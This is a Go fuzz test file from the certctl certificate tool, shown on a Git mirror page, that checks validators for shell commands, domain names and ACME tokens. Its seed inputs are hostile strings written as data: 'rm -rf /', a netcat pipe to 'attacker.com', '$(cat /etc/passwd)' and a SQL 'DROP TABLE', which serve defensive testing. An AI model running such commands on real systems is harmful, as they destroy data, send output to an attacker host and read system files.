gsadmin/certctl
1
0
Fork 0
mirror of https://github.com/shankar0123/certctl.git synced 2026-06-07 20:31:30 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
8f146e08d65183409e0f31c0543f6cd45093cfd0
certctl/internal/validation/command_fuzz_test.go
T
shankar0123 a0afa7ab6f test(security): TICKET-018 add fuzz tests for command validation and domain parsing 
Added Go native fuzz tests (testing/fuzz) for security-critical input validation:

1. FuzzValidateShellCommand in internal/validation/command_fuzz_test.go
   - Tests shell command validation with injection payloads (;, |, &, $, `, etc.)
   - Seed corpus includes valid commands and dangerous metacharacters
   - Ensures function never panics under fuzzing

2. FuzzValidateDomainName in internal/validation/command_fuzz_test.go
   - Tests RFC 1123 domain validation with wildcard support
   - Seed corpus includes SQL injection, path traversal, and malformed domains
   - Ensures function never panics under fuzzing

3. FuzzValidateACMEToken in internal/validation/command_fuzz_test.go
   - Tests base64url token validation
   - Seed corpus includes injection payloads and special characters
   - Ensures function never panics under fuzzing

4. FuzzIsValidRevocationReason in internal/domain/revocation_fuzz_test.go
   - Tests RFC 5280 revocation reason validation
   - Seed corpus includes case variations, injection attempts, and null bytes
   - Ensures function never panics and returns only valid booleans

5. FuzzCRLReasonCode in internal/domain/revocation_fuzz_test.go
   - Tests CRL reason code mapping
   - Validates return codes are within 0-9 range
   - Ensures invalid reasons default to 0 (unspecified)

All fuzz tests follow Go 1.18+ testing/fuzz conventions with seed corpus
for faster discovery of edge cases.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-27 21:40:49 -04:00

60 lines
1.4 KiB
Go
Raw Blame History

package validation
import "testing"
func FuzzValidateShellCommand(f *testing.F) {
f.Add("nginx -s reload")
f.Add("systemctl restart apache2")
f.Add("echo hello; rm -rf /")
f.Add("$(whoami)")
f.Add("")
f.Add("valid-command")
f.Add("/usr/bin/openssl")
f.Add("certctl-agent")
f.Add("; rm -rf /")
f.Add("| nc attacker.com 1234")
f.Add("`whoami`")
f.Add("$(cat /etc/passwd)")
f.Fuzz(func(t *testing.T, cmd string) {
// Should never panic, only return error for invalid input
_ = ValidateShellCommand(cmd)
})
}
func FuzzValidateDomainName(f *testing.F) {
f.Add("example.com")
f.Add("*.example.com")
f.Add("a.b.c.d.example.co.uk")
f.Add("")
f.Add("; rm -rf /")
f.Add("example.com; DROP TABLE certificates;")
f.Add("*.*.example.com")
f.Add("example..com")
f.Add("-example.com")
f.Add("example-.com")
f.Add("sub domain.com")
f.Add("@example.com")
f.Add("example.com/admin")
f.Add("//example.com")
f.Fuzz(func(t *testing.T, domain string) {
// Should never panic, only return error for invalid input
_ = ValidateDomainName(domain)
})
}
func FuzzValidateACMEToken(f *testing.F) {
f.Add("validtoken123")
f.Add("token-with-dash")
f.Add("token_with_underscore")
f.Add("")
f.Add("token;invalid")
f.Add("token|invalid")
f.Add("token$(whoami)")
f.Add("token\ninjection")
f.Add("token with spaces")
f.Fuzz(func(t *testing.T, token string) {
// Should never panic, only return error for invalid input
_ = ValidateACMEToken(token)
})
}
Reference in New Issue View Git Blame Copy Permalink